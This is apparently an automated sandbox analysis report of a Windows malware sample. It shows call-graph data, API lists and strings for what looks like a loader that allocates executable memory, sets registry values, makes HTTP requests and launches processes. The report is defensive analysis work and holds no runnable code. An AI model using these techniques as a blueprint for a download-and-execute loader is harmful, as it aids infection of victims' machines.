__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43428->43432 43429->42186 43668 402a20 70 API calls 43430->43668 43434 402f59 43431->43434 43435 402f8d 43432->43435 43433 403007 GetNativeSystemInfo 43433->43430 43437 403036 VirtualAlloc 43433->43437 43434->42186 43435->42186 43436->43430 43436->43433 43438 403050 VirtualAlloc 43437->43438 43439 403076 HeapAlloc 43437->43439 43438->43439 43440 403062 43438->43440 43443 403097 VirtualFree 43439->43443 43444 4030ab 43439->43444 43670 402a20 70 API calls 43440->43670 43443->43444 43446 4030f7 SetLastError 43444->43446 43447 40318f VirtualAlloc 43444->43447 43445 40306c 43445->43439 43448 4030ff 43446->43448 43457 4031aa __InternalCxxFrameHandler __CreateFrameInfo 43447->43457 43671 40faf8 43448->43671 43450 403152 HeapFree 43459 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43450->43459 43453 40332c 43453->43448 43660 402b80 43453->43660 43454 40faf8 __freea 14 API calls 43454->43450 43457->43446 43457->43448 43458 40328a 43457->43458 43651 402e60 VirtualAlloc 43457->43651 43652 402d00 43458->43652 43460 40318b 43459->43460 43460->42186 43461 40333b 43461->43448 43466 403343 43461->43466 43462 4033ca 43467 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43462->43467 43463 40337a 43464 4033b4 43463->43464 43465 403385 43463->43465 43468 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43464->43468 43471 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43465->43471 43466->43462 43466->43463 43469 4033e0 43467->43469 43470 4033c6 43468->43470 43469->42186 43470->42186 43472 4033b0 43471->43472 43472->42186 43475 100010ad 43474->43475 43476 100010bd CoUninitialize 43475->43476 43691 10005956 GetSystemTimeAsFileTime 43477->43691 43479 10001f48 43693 100059d5 43479->43693 43481 10001f4f _unexpected 43696 10001523 43481->43696 43483 10002174 43484 100010a3 CoUninitialize 43483->43484 43486 10002188 43484->43486 43738 100026ff 43486->43738 43488 10002025 43726 10001cdd 49 API calls __EH_prolog3_GS 43488->43726 43489 1000219b 43489->42239 43491 1000202e 43519 10002164 43491->43519 43727 100059b4 37 API calls _unexpected 43491->43727 43493 10001bb9 25 API calls 43495 10002172 43493->43495 43494 10002040 43728 10001c33 39 API calls 43494->43728 43495->43483 43497 10002052 43729 10002493 27 API calls __InternalCxxFrameHandler 43497->43729 43499 1000205f 43730 10002230 27 API calls __InternalCxxFrameHandler 43499->43730 43501 10002079 43731 10002230 27 API calls __InternalCxxFrameHandler 43501->43731 43503 1000209f 43732 1000219f 27 API calls __InternalCxxFrameHandler 43503->43732 43505 100020a9 43733 10001bb9 43505->43733 43508 10001bb9 25 API calls 43509 100020bb 43508->43509 43510 10001bb9 25 API calls 43509->43510 43511 100020c4 43510->43511 43737 10001725 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 43511->43737 43513 100020df _unexpected 43514 10002100 CreateProcessA 43513->43514 43515 10002135 43514->43515 43516 1000213c ShellExecuteA 43514->43516 43515->43516 43517 1000215b 43515->43517 43516->43517 43518 10001bb9 25 API calls 43517->43518 43518->43519 43519->43493 43520->42140 43521->42140 43522->42140 43523->42186 43524->42186 43525->42186 43528->42212 43529->42212 43530->42212 43531->42229 43533->42215 43534->42230 43535->42252 43536->42273 43537->42287 43538->42213 43539->42233 43540->42254 43541->42270 43542->42287 43543->42205 43544->42241 43545->42264 43546->42282 43547->42298 43548->42311 43549->42352 43550->42357 43551->42352 43552->42243 43553->42283 43554->42303 43555->42316 43556->42332 43557->42355 43558->42352 43559->42408 43560->42276 43561->42285 43562->42320 43563->42337 43564->42360 43565->42386 43566->42407 43567->42435 43568->42456 43569->42493 43570->42505 43571->42313 43572->42319 43573->42363 43574->42391 43575->42416 43576->42439 43577->42462 43578->42487 43579->42362 43580->42419 43581->42443 43582->42465 43583->42491 43584->42507 43585->42522 43586->42418 43587->42468 43588->42495 43589->42508 43590->42526 43591->42542 43592->42470 43593->42510 43594->42529 43595->42540 43596->42554 43597->42542 43598->42383 43599->42292 43608->43392 43609->43392 43610->43384 43611->43389 43613 40fd32 __cftof 43612->43613 43618 40fb58 43613->43618 43619 40fb8e 43618->43619 43620 40fba2 43619->43620 43621 40fbc6 43619->43621 43633 40fbbb 43619->43633 43643 40cf62 39 API calls __cftof 43620->43643 43622 40fbd6 43621->43622 43644 40f6a0 39 API calls 2 library calls 43621->43644 43625 40fc06 43622->43625 43626 40fbe8 43622->43626 43628 40fc14 43625->43628 43629 40fccc 43625->43629 43645 414d97 5 API calls ___scrt_uninitialize_crt 43626->43645 43628->43633 43646 414cfe MultiByteToWideChar ___scrt_uninitialize_crt 43628->43646 43629->43633 43648 414cfe MultiByteToWideChar ___scrt_uninitialize_crt 43629->43648 43632 40fc4a 43632->43633 43634 40fc55 GetLastError 43632->43634 43637 40cd1b 43633->43637 43634->43633 43635 40fc75 43634->43635 43635->43633 43647 414cfe MultiByteToWideChar ___scrt_uninitialize_crt 43635->43647 43638 40cd27 43637->43638 43639 40cd3e 43638->43639 43649 40cdc6 39 API calls 2 library calls 43638->43649 43642 4036cc CryptHashData 43639->43642 43650 40cdc6 39 API calls 2 library calls 43639->43650 43642->43409 43642->43410 43643->43633 43644->43622 43645->43633 43646->43632 43647->43633 43648->43633 43649->43639 43650->43642 43651->43457 43653 402e52 43652->43653 43657 402d20 43652->43657 43653->43453 43654 402e41 SetLastError 43654->43453 43655 402e24 SetLastError 43655->43453 43657->43653 43657->43654 43657->43655 43658 402e05 SetLastError 43657->43658 43658->43453 43665 402bb3 43660->43665 43661 402cd2 43662 402a50 52 API calls 43661->43662 43663 402ce4 43662->43663 43663->43461 43665->43661 43666 402cc9 43665->43666 43674 402a50 43665->43674 43666->43461 43667->43423 43668->43427 43669->43428 43670->43445 43672 4132f1 ___free_lconv_mon 14 API calls 43671->43672 43673 40311e 43672->43673 43673->43450 43673->43454 43675 402a69 43674->43675 43683 402aa5 43674->43683 43677 402abe VirtualProtect 43675->43677 43681 402a74 43675->43681 43676 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43678 402aba 43676->43678 43679 402b02 GetLastError FormatMessageA 43677->43679 43677->43683 43678->43665 43680 402b27 43679->43680 43680->43680 43682 402b2e LocalAlloc 43680->43682 43681->43683 43689 402e80 VirtualFree 43681->43689 43690 4029e0 44 API calls 43682->43690 43683->43676 43685 402b51 OutputDebugStringA LocalFree LocalFree 43686 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43685->43686 43687 402b77 43686->43687 43687->43665 43689->43683 43690->43685 43692 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 43691->43692 43692->43479 43745 10006e9c GetLastError 43693->43745 43697 1000152f __EH_prolog3_GS 43696->43697 43790 1000184b 43697->43790 43700 100015ff 43799 1000179a 43700->43799 43701 10001593 43794 1000190a 43701->43794 43703 10001541 43703->43701 43709 1000179a 27 API calls 43703->43709 43704 1000160d 43804 10005939 43704->43804 43707 10001650 InternetSetOptionA InternetConnectA 43711 10001692 HttpOpenRequestA 43707->43711 43712 100016e8 InternetCloseHandle 43707->43712 43708 100016eb 43710 10001704 43708->43710 43853 10001bdc 25 API calls 43708->43853 43709->43701 43714 10001bb9 25 API calls 43710->43714 43715 100016e2 InternetCloseHandle 43711->43715 43716 100016bc 43711->43716 43712->43708 43717 1000171b 43714->43717 43715->43712 43807 100010c7 43716->43807 43854 1000e8a5 43717->43854 43722 100016d3 43821 10001175 43722->43821 43723 100016df InternetCloseHandle 43723->43715 43726->43491 43727->43494 43728->43497 43729->43499 43730->43501 43731->43503 43732->43505 43734 10001bc4 43733->43734 43735 10001bcc 43733->43735 43897 10001bdc 25 API calls 43734->43897 43735->43508 43737->43513 43739 10002707 43738->43739 43740 10002708 IsProcessorFeaturePresent 43738->43740 43739->43489 43742 10002b1c 43740->43742 43898 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43742->43898 43744 10002bff 43744->43489 43746 10006eb3 43745->43746 43747 10006eb9 43745->43747 43775 10007580 6 API calls _unexpected 43746->43775 43751 10006ebf SetLastError 43747->43751 43776 100075bf 6 API calls _unexpected 43747->43776 43750 10006ed7 43750->43751 43752 10006edb 43750->43752 43756 10006f53 43751->43756 43757 100059df 43751->43757 43777 10007aa7 14 API calls 2 library calls 43752->43777 43755 10006ee7 43758 10006f06 43755->43758 43759 10006eef 43755->43759 43788 10006928 37 API calls _unexpected 43756->43788 43757->43481 43785 100075bf 6 API calls _unexpected 43758->43785 43778 100075bf 6 API calls _unexpected 43759->43778 43763 10006efd 43779 10007a3c 43763->43779 43765 10006f12 43766 10006f16 43765->43766 43767 10006f27 43765->43767 43786 100075bf 6 API calls _unexpected 43766->43786 43787 10006c9e 14 API calls _unexpected 43767->43787 43771 10006f03 43771->43751 43772 10006f32 43773 10007a3c _free 14 API calls 43772->43773 43774 10006f39 43773->43774 43774->43751 43775->43747 43776->43750 43777->43755 43778->43763 43780 10007a70 __dosmaperr 43779->43780 43781 10007a47 RtlFreeHeap 43779->43781 43780->43771 43781->43780 43782 10007a5c 43781->43782 43789 10005926 14 API calls __dosmaperr 43782->43789 43784 10007a62 GetLastError 43784->43780 43785->43765 43786->43763 43787->43772 43789->43784 43791 10001868 43790->43791 43791->43791 43792 1000190a 27 API calls 43791->43792 43793 1000187c 43792->43793 43793->43703 43795 10001978 43794->43795 43798 10001920 __InternalCxxFrameHandler 43794->43798 43857 10001a59 27 API calls std::_Xinvalid_argument 43795->43857 43798->43700 43800 100017eb 43799->43800 43802 100017b3 __InternalCxxFrameHandler 43799->43802 43858 10001884 27 API calls 43800->43858 43802->43704 43859 100070ee 43804->43859 43808 100010d3 __EH_prolog3_GS 43807->43808 43809 1000184b 27 API calls 43808->43809 43810 100010e3 HttpAddRequestHeadersA 43809->43810 43885 100017f1 43810->43885 43812 10001112 HttpAddRequestHeadersA 43813 100017f1 27 API calls 43812->43813 43814 10001132 HttpAddRequestHeadersA 43813->43814 43815 100017f1 27 API calls 43814->43815 43816 10001152 HttpAddRequestHeadersA 43815->43816 43817 10001bb9 25 API calls 43816->43817 43818 1000116d 43817->43818 43819 1000e8a5 5 API calls 43818->43819 43820 10001172 HttpSendRequestA 43819->43820 43820->43722 43820->43723 43822 10001184 __EH_prolog3_GS 43821->43822 43823 100011c5 InternetSetFilePointer 43822->43823 43824 100011e3 InternetReadFile 43823->43824 43825 1000121d __InternalCxxFrameHandler 43824->43825 43825->43824 43826 10001260 _unexpected 43825->43826 43827 1000127d HttpQueryInfoA 43826->43827 43828 100012a6 CoCreateInstance 43827->43828 43829 1000150a 43827->43829 43828->43829 43831 100012d8 43828->43831 43830 1000e8a5 5 API calls 43829->43830 43832 10001520 43830->43832 43831->43829 43833 1000184b 27 API calls 43831->43833 43832->43723 43834 100012f7 43833->43834 43890 10001006 30 API calls 43834->43890 43836 1000130c 43837 10001bb9 25 API calls 43836->43837 43838 1000134f _unexpected 43837->43838 43839 100014ae __InternalCxxFrameHandler 43838->43839 43840 10001427 __InternalCxxFrameHandler 43838->43840 43847 10001456 43838->43847 43848 10001449 43838->43848 43839->43829 43840->43839 43841 1000149d 43840->43841 43844 100014aa _unexpected 43840->43844 43894 10005926 14 API calls __dosmaperr 43841->43894 43843 100014a2 43896 1000584c 25 API calls __strnicoll 43843->43896 43844->43839 43895 10005926 14 API calls __dosmaperr 43844->43895 43847->43840 43892 10005926 14 API calls __dosmaperr 43847->43892 43891 10005926 14 API calls __dosmaperr 43848->43891 43850 1000144e 43893 1000584c 25 API calls __strnicoll 43850->43893 43853->43710 43855 100026ff __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43854->43855 43856 10001722 43855->43856 43856->43483 43856->43488 43864 10007102 43859->43864 43860 10007106 43861 10001629 InternetOpenA 43860->43861 43878 10005926 14 API calls __dosmaperr 43860->43878 43861->43707 43861->43708 43863 10007130 43879 1000584c 25 API calls __strnicoll 43863->43879 43864->43860 43864->43861 43866 10007140 43864->43866 43880 100069d1 37 API calls 2 library calls 43866->43880 43868 1000714c 43869 10007156 43868->43869 43872 1000716d 43868->43872 43881 1000a31e 25 API calls 2 library calls 43869->43881 43871 100071ef 43871->43861 43882 10005926 14 API calls __dosmaperr 43871->43882 43872->43871 43873 10007244 43872->43873 43873->43861 43884 10005926 14 API calls __dosmaperr 43873->43884 43876 10007238 43883 1000584c 25 API calls __strnicoll 43876->43883 43878->43863 43879->43861 43880->43868 43881->43861 43882->43876 43883->43861 43884->43861 43886 100017ff 43885->43886 43886->43886 43887 1000180d __InternalCxxFrameHandler 43886->43887 43889 1000188f 27 API calls __InternalCxxFrameHandler 43886->43889 43887->43812 43889->43887 43890->43836 43891->43850 43892->43850 43893->43840 43894->43843 43895->43843 43896->43839 43897->43735 43898->43744 43900 4128e2 _unexpected 39 API calls 43899->43900 43901 4106c6 43900->43901 43901->42623 44024 408ab0 43902->44024 43904 403d22 43904->42623 43905 4106c1 39 API calls 43906 403cc2 43905->43906 43906->43904 43906->43905 44038 408ff0 43 API calls 3 library calls 43906->44038 43909 40229b 43908->43909 43910 40223d 43908->43910 43912 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43909->43912 43910->43909 43911 402243 CreateFileA 43910->43911 43911->43909 43913 402263 WriteFile CloseHandle 43911->43913 43914 4022a9 43912->43914 43915 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43913->43915 43914->42664 43916 402295 43915->43916 43916->42664 43917->42632 43918->42638 43919->42634 43920->42645 43921->42654 43922->42646 43923->42683 43924->42691 43925->42685 43926->42704 43927->42712 43928->42708 43929->42739 43930->42748 43931->42742 43932->42775 43933->42783 43934->42790 43935->42769 43936->42660 43937->42660 43938->42660 43939->42703 43940->42703 43941->42703 43944->42781 43945->42781 43946->42781 43947->42806 43949->42784 43950->42807 43951->42831 43952->42851 43953->42865 43954->42782 43955->42805 43956->42829 43957->42849 43958->42865 43959->42768 43960->42816 43961->42841 43962->42858 43963->42877 43964->42890 43965->42930 43966->42934 43967->42930 43968->42820 43969->42861 43970->42880 43971->42893 43972->42912 43973->42935 43974->42930 43975->42985 43977->42863 43978->42898 43979->42914 43980->42938 43981->42961 43982->42989 43983->43013 43988->42897 43989->42940 43990->42966 43991->42993 43992->43018 43995->42939 43996->42996 43997->43022 44002->42995 44014->42963 44015->42870 44026 408acb 44024->44026 44037 408bb4 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 44024->44037 44025 408c41 44041 401600 43 API calls 3 library calls 44025->44041 44026->44025 44030 408b61 44026->44030 44031 408b3a 44026->44031 44036 408b4b __InternalCxxFrameHandler 44026->44036 44026->44037 44028 408c46 44042 401560 41 API calls 3 library calls 44028->44042 44030->44036 44040 401560 41 API calls 4 library calls 44030->44040 44031->44028 44039 401560 41 API calls 4 library calls 44031->44039 44032 408c4b 44035 40cfef 39 API calls 44035->44025 44036->44035 44036->44037 44037->43906 44038->43906 44039->44036 44040->44036 44041->44028 44042->44032 44043->43197 44047 412bcd 44044->44047 44048 412be1 44047->44048 44051 412be5 44048->44051 44052 412c1f 44048->44052 44065 40203e InternetOpenA 44048->44065 44050 412c0f 44067 40cfdf 39 API calls __cftof 44050->44067 44051->44065 44066 40d0dd 14 API calls __dosmaperr 44051->44066 44068 40d10d 39 API calls 2 library calls 44052->44068 44055 412c2b 44056 412c35 44055->44056 44061 412c4c 44055->44061 44069 419419 39 API calls 2 library calls 44056->44069 44058 412d2e 44058->44065 44072 40d0dd 14 API calls __dosmaperr 44058->44072 44060 412cd6 44060->44065 44070 40d0dd 14 API calls __dosmaperr 44060->44070 44061->44058 44061->44060 44063 412d22 44071 40cfdf 39 API calls __cftof 44063->44071 44065->43207 44066->44050 44067->44065 44068->44055 44069->44065 44070->44063 44071->44065 44072->44065 44074 41050c 44073->44074 44075 41051e 44073->44075 44100 40a6de GetModuleHandleW 44074->44100 44085 410370 44075->44085 44078 410511 44078->44075 44101 4105c0 GetModuleHandleExW 44078->44101 44080 40a224 44080->41577 44086 41037c __FrameHandler3::FrameUnwindToState 44085->44086 44107 4108cb EnterCriticalSection 44086->44107 44088 410386 44108 4103f7 44088->44108 44090 410393 44112 4103b1 44090->44112 44093 410576 44117 4105a7 44093->44117 44095 410580 44096 410594 44095->44096 44097 410584 GetCurrentProcess TerminateProcess 44095->44097 44098 4105c0 __CreateFrameInfo 3 API calls 44096->44098 44097->44096 44099 41059c ExitProcess 44098->44099 44100->44078 44102 410620 44101->44102 44103 4105ff GetProcAddress 44101->44103 44104 410626 FreeLibrary 44102->44104 44105 41051d 44102->44105 44103->44102 44106 410613 44103->44106 44104->44105 44105->44075 44106->44102 44107->44088 44110 410403 __FrameHandler3::FrameUnwindToState __CreateFrameInfo 44108->44110 44109 410467 __CreateFrameInfo 44109->44090 44110->44109 44115 412025 14 API calls 2 library calls 44110->44115 44116 410913 LeaveCriticalSection 44112->44116 44114 41039f 44114->44080 44114->44093 44115->44109 44116->44114 44120 415029 5 API calls __CreateFrameInfo 44117->44120 44119 4105ac __CreateFrameInfo 44119->44095 44120->44119 44121 6f42dc 44122 6f42e3 VirtualProtect 44121->44122 44124 6f433f 44122->44124 44125 10005bf4 44126 10007a3c _free 14 API calls 44125->44126 44127 10005c0c 44126->44127 44128 5f7389 44129 5f731d LoadLibraryA 44128->44129 44130 5f7396 44128->44130 44131 5f5ac7 44135 5f5acb 44131->44135 44132 5f9a0e RegOpenKeyA 44132->44135 44133 5f99e7 RegOpenKeyA 44133->44132 44133->44135 44134 5f9a6f GetNativeSystemInfo 44134->44135 44135->44132 44135->44133 44135->44134 44136 5f5436 44135->44136 44137 6d1ad5 44138 6d24d0 44137->44138 44139 6d2505 CreateThread 44138->44139 44140 6d2500 44138->44140 44139->44140 44141 470d7f 44139->44141 44142 100079ee 44143 10007a2c 44142->44143 44147 100079fc _unexpected 44142->44147 44150 10005926 14 API calls __dosmaperr 44143->44150 44145 10007a17 RtlAllocateHeap 44146 10007a2a 44145->44146 44145->44147 44147->44143 44147->44145 44149 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 44147->44149 44149->44147 44150->44146 44151 493003c 44152 4930049 44151->44152 44153 493004c 44151->44153 44167 4930e0f SetErrorMode SetErrorMode 44153->44167 44158 4930265 44159 49302ce VirtualProtect 44158->44159 44161 493030b 44159->44161 44160 4930439 VirtualFree 44165 49305f4 LoadLibraryA 44160->44165 44166 49304be 44160->44166 44161->44160 44162 49304e3 LoadLibraryA 44162->44166 44164 49308c7 44165->44164 44166->44162 44166->44165 44168 4930223 44167->44168 44169 4930d90 44168->44169 44170 4930dad 44169->44170 44171 4930dbb GetPEB 44170->44171 44172 4930238 VirtualAlloc 44170->44172 44171->44172 44172->44158
                                                        APIs
                                                        • GetTempPathA.KERNEL32(00000104,?,6CC08CF2,771B0F00,00000000), ref: 00403DAA
                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                                                        • Sleep.KERNEL32(000003E8), ref: 00403F42
                                                        • __Init_thread_footer.LIBCMT ref: 00404517
                                                        • __Init_thread_footer.LIBCMT ref: 004046DD
                                                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                                                        • __Init_thread_footer.LIBCMT ref: 00404975
                                                        • __Init_thread_footer.LIBCMT ref: 00404BDE
                                                        • CoInitialize.OLE32(00000000), ref: 00404C5F
                                                        • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                                                        • __Init_thread_footer.LIBCMT ref: 004050DD
                                                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                                                        • __Init_thread_footer.LIBCMT ref: 004053EB
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                                                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,6CC08CF2), ref: 00410837
                                                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                                                        • CoUninitialize.COMBASE(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                                                        • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                                                        • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                                                        • __Init_thread_footer.LIBCMT ref: 00404046
                                                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                          • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                                                          • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                                                          • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                                                        • __Init_thread_footer.LIBCMT ref: 00404222
                                                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                                        • String ID: O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                                                        • API String ID: 995133137-4217594176
                                                        • Opcode ID: fc296b8ebabf87ab453db46733e4af5c0f90cf00110a11acb1cebe7bac2205c4
                                                        • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                                                        • Opcode Fuzzy Hash: fc296b8ebabf87ab453db46733e4af5c0f90cf00110a11acb1cebe7bac2205c4
                                                        • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59
                                                        APIs
                                                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,6CC08CF2), ref: 00410837
                                                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                                                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                        • __Init_thread_footer.LIBCMT ref: 004050DD
                                                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                                                        • __Init_thread_footer.LIBCMT ref: 004053EB
                                                        • Sleep.KERNEL32(000007D0), ref: 00405755
                                                        • Sleep.KERNEL32(000007D0), ref: 0040576F
                                                        • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                                                        • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                                                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                                                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                        • String ID: @BAO$SUB=$get$mixone$updateSW$u%
                                                        • API String ID: 606935701-4262164818
                                                        • Opcode ID: 2675d1e0df0572c272326b90cc376ba1d1ddc9910572af857a67036b4fb5b0b8
                                                        • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                                                        • Opcode Fuzzy Hash: 2675d1e0df0572c272326b90cc376ba1d1ddc9910572af857a67036b4fb5b0b8
                                                        • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2198 402ee0-402efe 2199 402f00-402f27 SetLastError call 402a20 call 409a17 2198->2199 2200 402f28-402f30 2198->2200 2201 402f32 2200->2201 2202 402f5d-402f67 2200->2202 2204 402f37-402f5c call 402a20 SetLastError call 409a17 2201->2204 2205 402f91-402f9f 2202->2205 2206 402f69-402f90 SetLastError call 402a20 call 409a17 2202->2206 2210 402fa1-402fa6 2205->2210 2211 402fa8-402fb1 2205->2211 2210->2204 2216 402fb3-402fb8 2211->2216 2217 402fbd-402fc5 2211->2217 2216->2204 2218 402fd1-402fde 2217->2218 2219 402fc7-402fcc 2217->2219 2222 402fe0-402fe2 2218->2222 2223 403007-40302a GetNativeSystemInfo 2218->2223 2219->2204 2226 402fe5-402fec 2222->2226 2227 403036-40304e VirtualAlloc 2223->2227 2228 40302c-403031 2223->2228 2229 402ff3 2226->2229 2230 402fee-402ff1 2226->2230 2231 403050-403060 VirtualAlloc 2227->2231 2232 403076-403095 HeapAlloc 2227->2232 2228->2204 2233 402ff5-403002 2229->2233 2230->2233 2231->2232 2234 403062-40306f call 402a20 2231->2234 2238 403097-4030a4 VirtualFree 2232->2238 2239 4030ab-4030f1 2232->2239 2233->2226 2236 403004 2233->2236 2234->2232 2236->2223 2238->2239 2241 4030f7-4030f9 SetLastError 2239->2241 2242 40318f-4031d9 VirtualAlloc call 40aff0 2239->2242 2244 4030ff-403103 2241->2244 2248 40328d-403298 2242->2248 2249 4031df 2242->2249 2246 403105-403112 2244->2246 2247 403116-403126 call 40faf8 2244->2247 2246->2247 2260 403155-40315a 2247->2260 2261 403128-40312d 2247->2261 2252 40331d 2248->2252 2253 40329e-4032a5 2248->2253 2251 4031e2-4031e7 2249->2251 2256 403226-40322e 2251->2256 2257 4031e9-4031f1 2251->2257 2255 403322-40332e call 402d00 2252->2255 2258 4032a7-4032a9 2253->2258 2259 4032ae-4032c0 2253->2259 2255->2244 2281 403334-403336 call 402b80 2255->2281 2256->2241 2268 403234-403247 call 402e60 2256->2268 2263 403272-403284 2257->2263 2264 4031f3-40320d 2257->2264 2258->2255 2259->2252 2267 4032c2-4032d7 2259->2267 2265 40315c-40316c 2260->2265 2266 40316f-40318e HeapFree call 409a17 2260->2266 2269 40314c-403152 call 40faf8 2261->2269 2270 40312f 2261->2270 2263->2251 2273 40328a 2263->2273 2264->2244 2289 403213-403224 call 40b570 2264->2289 2265->2266 2275 4032d9-4032dc 2267->2275 2276 40330e-403318 2267->2276 2277 403249-40324e 2268->2277 2269->2260 2271 403130-403135 2270->2271 2278 403146-40314a 2271->2278 2279 403137-403143 2271->2279 2273->2248 2285 4032e0-4032f1 2275->2285 2276->2267 2280 40331a 2276->2280 2277->2244 2287 403254-403269 call 40aff0 2277->2287 2278->2269 2278->2271 2279->2278 2280->2252 2296 40333b-40333d 2281->2296 2290 